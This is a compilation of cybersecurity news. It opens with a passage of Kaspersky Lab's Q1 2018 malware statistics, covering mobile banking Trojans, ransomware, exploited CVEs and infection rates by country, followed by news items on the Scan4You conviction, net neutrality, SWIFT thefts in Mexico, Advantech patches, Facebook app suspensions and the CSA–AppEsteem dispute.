* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.

The most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.

Note that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.

Geography of mobile banking threats in Q1 2018 (percentage of attacked users)

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %**
1 Russia 0.74
2 USA 0.65
3 Tajikistan 0.31
4 Uzbekistan 0.30
5 China 0.26
6 Turkey 0.22
7 Ukraine 0.22
8 Kazakhstan 0.22
9 Poland 0.17
10 Moldova 0.16
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in this country.

The Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.

The US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the Trojan-Banker.AndroidOS.Svpeng family, as well as Trojan-Banker.AndroidOS.Faketoken.z.

Mobile ransomware Trojans
In Q1 2018, we detected 8,787 installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a “banker.”

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 – Q1 2018)

Note that despite the decline in their total number, ransomware Trojans remain a serious threat — technically they are now far more advanced and dangerous. For instance, Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove those rights. If no PIN is set (the lock could also be a pattern, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.

The most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a — it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a; both have the same creators.

Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %**
1 Kazakhstan 0.99
2 Italy 0.64
3 Ireland 0.63
4 Poland 0.61
5 Belgium 0.56
6 Austria 0.38
7 Romania 0.37
8 Hungary 0.34
9 Germany 0.33
10 Switzerland 0.29
* Excluded from the rating are countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (fewer than 10,000)
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

First place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).

Vulnerable apps used by cybercriminals
In Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years — browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications that it can only be compared to the number of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.

Distribution of exploits used in attacks by type of application attacked, Q1 2018

The most frequently used vulnerability in Microsoft Office in Q1 was CVE-2017-11882 — a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab’s Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.

As for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.

Large-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited EternalBlue and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.

Malicious programs online (attacks via web resources)
The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Online threats in the financial sector
Q1 events
In early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind Dridex. As a result, the malware was rebranded FriedEx.

Q1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, as reported by Europol. Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization’s network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances, with money mules being used to collect the proceeds.

Financial threat statistics
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats.

In Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.

Number of unique users attacked by financial malware, Q1 2018

Geography of attacks
To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks in Q1 2018 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of users attacked**
1 Cameroon 2.1
2 Germany 1.7
3 South Korea 1.5
4 Libya 1.5
5 Togo 1.5
6 Armenia 1.4
7 Georgia 1.4
8 Moldova 1.2
9 Kyrgyzstan 1.2
10 Indonesia 1.1
* These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

TOP 10 banking malware families
TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):

Name Verdicts* % of attacked users**
1 Zbot Trojan.Win32.Zbot 28.0%
2 Nymaim Trojan.Win32.Nymaim 20.3%
3 Caphaw Backdoor.Win32.Caphaw 15.2%
4 SpyEye Backdoor.Win32.SpyEye 11.9%
5 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 4.5%
6 Emotet Backdoor.Win32.Emotet 2.4%
7 Neurevt Trojan.Win32.Neurevt 2.3%
8 Shiz Backdoor.Win32.Shiz 2.1%
9 Gozi Trojan.Win32.Gozi 1.9%
10 ZAccess Backdoor.Win32.ZAccess 1.3%
* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as Heodo. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.

Cryptoware programs
Q1 events
Q1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called GandCrab. Notable features of the malware include:

Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)
Ransom demand in the cryptocurrency Dash
GandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.

The RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called Data Keeper, able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by “affiliate program” participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.

One notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police managed to locate and confiscate a server used by the masterminds behind the Trojan Cryakl. Following the operation, Kaspersky Lab was given several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a tool to assist victims.

Number of new modifications
In Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.

Number of new cryptoware modifications, Q2 2017 – Q1 2018

The number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.

Number of users attacked by Trojan cryptors
During the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.

Number of unique users attacked by cryptors, Q1 2018

Geography of attacks

TOP 10 countries attacked by Trojan cryptors

Country* % of users attacked by cryptors**
1 Uzbekistan 1.12
2 Angola 1.11
3 Vietnam 1.04
4 Venezuela 0.95
5 Indonesia 0.95
6 Pakistan 0.93
7 China 0.87
8 Azerbaijan 0.75
9 Bangladesh 0.70
10 Mongolia 0.64
* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

The makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.

Despite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.

TOP 10 most widespread cryptor families

Name Verdicts* % of attacked users**
1 WannaCry Trojan-Ransom.Win32.Wanna 38.33
2 PolyRansom/VirLock Virus.Win32.PolyRansom 4.07
3 Cerber Trojan-Ransom.Win32.Zerber 4.06
4 Cryakl Trojan-Ransom.Win32.Cryakl 2.99
5 (generic verdict) Trojan-Ransom.Win32.Crypren 2.77
6 Shade Trojan-Ransom.Win32.Shade 2.61
7 Purgen/GlobeImposter Trojan-Ransom.Win32.Purgen 1.64
8 Crysis Trojan-Ransom.Win32.Crusis 1.62
9 Locky Trojan-Ransom.Win32.Locky 1.23
10 (generic verdict) Trojan-Ransom.Win32.Gen 1.15
* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

This quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that’s been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.

The remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.

Countries that are sources of web-based attacks: TOP 10
The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2018, Kaspersky Lab solutions blocked 796,806,112 attacks launched from Internet resources located in 194 countries worldwide. 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.

Distribution of web attack sources by country, Q1 2018

This quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of the TOP 10 and were replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).

Countries where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

#    Country*        % of attacked users**
1    Belarus         40.90
2    Ukraine         40.32
3    Algeria         39.69
4    Albania         37.33
5    Moldova         37.17
6    Greece          36.83
7    Armenia         36.78
8    Azerbaijan      35.13
9    Kazakhstan      34.64
10   Russia          34.56
11   Kyrgyzstan      33.77
12   Venezuela       33.10
13   Uzbekistan      31.52
14   Georgia         31.40
15   Latvia          29.85
16   Tunisia         29.77
17   Romania         29.09
18   Qatar           28.71
19   Vietnam         28.66
20   Serbia          28.55
These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 23.69% of Internet user computers worldwide experienced at least one Malware-class attack.

Geography of malicious web attacks in Q1 2018 (percentage of attacked users)

The countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).

Local threats
Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2018, our File Anti-Virus detected 187,597,494 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only Malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

#    Country*        % of attacked users**
1    Uzbekistan      57.03
2    Afghanistan     56.02
3    Yemen           54.99
4    Tajikistan      53.08
5    Algeria         49.07
6    Turkmenistan    48.68
7    Ethiopia        48.21
8    Mongolia        46.84
9    Kyrgyzstan      46.53
10   Sudan           46.44
11   Vietnam         46.38
12   Syria           46.12
13   Rwanda          46.09
14   Laos            45.66
15   Libya           45.50
16   Djibouti        44.96
17   Iraq            44.65
18   Mauritania      44.55
19   Kazakhstan      44.19
20   Bangladesh      44.15
These statistics are based on detection verdicts returned by the OAS (on-access scan) and ODS (on-demand scan) Anti-Virus modules, received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or on removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 23.39% of computers globally faced at least one Malware-class local threat in Q1.

The figure for Russia was 30.92%.

The safest countries in terms of infection risk included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).


U.S. Jury Convicts Operator of Counter AV Service Scan4You
17.5.2018 securityweek  Crime

A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.

Ruslans Bondars, a citizen of the former USSR, had been residing in Riga, Latvia, when he was arrested in May 2017 along with Russian national Jurijs Martisevs. Martisevs was on a trip to Latvia when he was taken into custody.

Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.

Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.

Martisevs pleaded guilty in March to conspiracy, for which he faces up to 5 years in prison, and aiding and abetting computer intrusions, for which he faces 10 years in prison. His sentencing is scheduled for July.

According to Trend Micro, whose experts helped authorities investigate Scan4You, the service was launched in 2009 and was active until the arrests of its operators. An unnamed individual from Great Falls, Virginia, was also allegedly involved.

Bondars (known online as b0rland and Borland) and Martisevs (known online as Garrik) started their cybercrime career in at least 2006, and they managed to turn Scan4You into one of the largest counter antivirus services, with thousands of customers.

Scan4You allowed cybercriminals to conduct 100,000 scans per month for $30 and $0.15 for single scans. The service was also popular among counter antivirus resellers such as Indetectables, RazorScanner and reFUD.me.

Trend Micro says Bondars and Martisevs were also involved with a shady online pharmacy and launched their own banking malware campaigns.

However, they did a poor job at hiding their identity. Bondars, for instance, used the same Gmail account to register command and control (C&C) domains for his banking malware and to create a Facebook account. The Gmail account contained his real name and profile photo.

According to authorities, Scan4You was used to test the malware involved in the massive 2013 breach at the U.S. retailer Target. The service was also used in the development of Citadel, a banking trojan that infected over 11 million computers worldwide, which resulted in over $500 million in fraud-related losses.


U.S. Senate Votes to Restore 'Net Neutrality' Rules
17.5.2018 securityweek  BigBrothers

The US Senate voted Wednesday to restore so-called "net neutrality" rules aimed at requiring all online data to be treated equally, the latest step in a years-long battle on internet regulation.

The 52-47 vote is likely to be symbolic, however, since the measure faces an uphill battle in the House of Representatives and would need enough lawmaker support to overturn a probable presidential veto.

The vote marked the latest step in a contentious fight over rules governing online access over the past decade including court challenges and various moves by regulators.

Related: Security Implications of the End of Net Neutrality

In December, the Federal Communications Commission voted 3-2 along party lines to reverse a 2015 order which established net neutrality and which itself had faced court challenges and intense partisan debate.

In the Senate, three Republicans joined Democrats in the vote under the Congressional Review Act, which allows lawmakers to overturn a regulatory body.

FCC chairman Ajit Pai, appointed by President Donald Trump, has argued that the 2015 rules were "heavy-handed" and failed to take into account the rapidly changing landscape for online services and were discouraging investment in advanced networks.

Net neutrality backers have argued that clear rules are needed to prevent internet service providers from blocking or throttling services or websites for competitive reasons.

Some activists fear internet service providers will seek to extract higher fees from services that are heavy data users, like Netflix or other streaming services, with these costs passed on to consumers.

The battle has been largely along party lines, and has also been split with large tech firms supporting neutrality and telecom operators backing more flexible rules.

Although the Senate vote may not succeed in restoring neutrality rules, backers said it would allow voters to know where their lawmakers stand.

Democratic Senator Ed Markey said on Twitter the vote would "show the American people who sides with them, and who sides with the powerful special interests and corporate donors who are thriving under the @realDonaldTrump administration."

Ferras Vinh of the Center for Democracy & Technology, a digital rights group, welcomed the vote.

"Without net neutrality protections, internet service providers will have an explicit license to block, slow, or levy tolls on content, which will limit choices for internet users and suffocate small businesses looking to enter the market," Vinh said.

"These protections are the guiding principles of the open internet, facilitating innovation and enabling the spread of new ideas."

But USTelecom, an industry group representing major broadband carriers, expressed disappointment.

"This vote throws into reverse our shared goal of maintaining an open, thriving internet," said association president Jonathan Spalter.

"Consumers want permanent, comprehensive online protections, not half measures or election-year posturing from our representatives in Congress."


Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks
17.5.2018 securityaffairs Hacking

The head of the Mexican central bank, Alejandro Diaz de Leon announced this week that hackers were involved in shadowy transfers of between $18 million and $20 million.
The Mexican central bank is the latest victim of the SWIFT hackers: officials at the bank confirmed this week that attackers hit the payments system and stole millions of dollars from domestic banks.

The attack was discovered in late April and presents many similarities with past attacks against the SWIFT systems.

The Mexican central bank did not disclose the name of the banks that were hit by the cyber attack and did not detail the overall amount of money that crooks have stolen.

According to Alejandro Diaz de Leon, head of Mexico’s central bank, crooks were able to complete illicit transactions of $18 million to $20 million.

“Central bank Governor Alejandro Diaz de Leon said on Monday that the country had seen an unprecedented attack on payment system connections and that he hoped that measures being taken would stop future incidents,” Reuters reported.

“A source close to the government’s investigation said more than 300 million had been siphoned out of banks, but it was not clear how much had subsequently been taken out in cash withdrawals.”

Mexican central bank cyberheist

According to reports, following the latest cyber attacks Mexico’s central bank has created a cybersecurity division and has instituted a one-day waiting period on electronic funds transfers of more than $2,500.

“Perhaps, some financial institutions perceived the attacks in Bangladesh as something very distant,” said Alejandro Diaz de Leon who believes that some Mexican banks may not have invested in sufficient security measures.

“But criminals look for vulnerability and once they see it they are going to exploit it.”

Mexican depositors won’t be affected, but the overall losses for the local banks could be greater than initially thought.


Critical Code Execution Flaws Patched in Advantech WebAccess
16.5.2018 securityweek  Vulnerability

Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.

The list of security holes rated critical includes unrestricted file upload, path traversal, stack-based buffer overflow, and untrusted pointer dereference issues, all of which can be exploited for arbitrary code execution.

Advantech has also fixed high severity vulnerabilities that can be exploited to obtain sensitive information, modify files, and delete files. There are also a couple of medium severity issues that can be leveraged to steal session cookies and obtain potentially sensitive data through SQL injection.

According to ICS-CERT, the flaws affect WebAccess versions V8.2_20170817 and prior, WebAccess V8.3.0 and prior, WebAccess Dashboard V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior. The vendor patched them with the release of version 8.3.1 last week.

ICS-CERT has credited researchers Mat Powell, Andrea Micalizzi (rgod), Steven Seeley, Donato Onofri and Simone Onofri for discovering the security bugs. Many of the weaknesses were reported through Trend Micro’s Zero Day Initiative (ZDI), which will publish advisories in the coming weeks.

Seeley has identified tens of vulnerabilities in WebAccess this year, and some of them, affecting WebAccess HMI Designer, were disclosed in April before Advantech released patches.

ICS-CERT has published a total of four advisories for Advantech WebAccess vulnerabilities this year, including two in January.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better compared to many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, which was roughly half the number published in the previous year.


Facebook Suspends 200 Apps Over Data Misuse
16.5.2018 securityweek  Social

Facebook said Monday it has suspended "around 200" apps on its platform as part of an investigation into misuse of private user data.

The investigation was launched after revelations that political consulting firm Cambridge Analytica hijacked data on some 87 million Facebook users as it worked on Donald Trump's 2016 campaign.

"The investigation process is in full swing," said an online statement from Facebook product partnerships vice president Ime Archibong.

"We have large teams of internal and external experts working hard to investigate these apps as quickly as possible. To date thousands of apps have been investigated and around 200 have been suspended -- pending a thorough investigation into whether they did in fact misuse any data."

Archibong added that "where we find evidence that these or other apps did misuse data, we will ban them and notify people via this website."

The revelations over Cambridge Analytica have prompted investigations on both sides of the Atlantic and led Facebook to tighten its policies on how personal data is shared and accessed.

Facebook made a policy change in 2014 limiting access to user data but noted that some applications still had data it had obtained prior to the revision.

"There is a lot more work to be done to find all the apps that may have misused people's Facebook data -- and it will take time," Archibong said.


Behind the Scenes in the Deceptive App Wars
16.5.2018 securityweek  Security

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described as potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront about how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director, program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – from the CSA. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled, CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative. It raises some interesting points. The ‘groundswell of complaints’ is to be expected; particularly from the apps and the app developers called out for being deceptive.

However, concern over some other elements seems valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which a user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I’m unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org, which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to remain anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA,” Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

